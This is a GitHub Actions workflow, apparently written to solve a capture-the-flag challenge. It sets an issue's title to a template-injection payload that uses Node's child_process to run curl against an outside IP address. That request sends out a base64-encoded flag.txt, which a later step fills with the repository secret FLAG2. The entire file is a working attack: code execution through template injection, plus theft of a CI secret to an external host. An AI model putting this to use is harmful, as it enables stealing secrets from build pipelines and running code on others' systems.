name: Tracking the issue
on:
  issues:
    types: [opened]

permissions:
  issues: write
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl \
          -X PATCH \
          -H "Authorization: token ${{ github.token }}" \
          -H "Accept: application/vnd.github.v3+json" \
          https://api.github.com/repos/${{github.repository}}/issues/${{github.event.issue.number}} \
          -d '{"title":"{{process.mainModule.require('child_process').exec('curl https://101.43.241.151：7001/?$(cat flag.txt | base64)')}}", "body": "action run finished"}'

      - run: echo "${{ secrets.FLAG2 }}" > flag.txt
      - uses: hackerify/issue-template@main
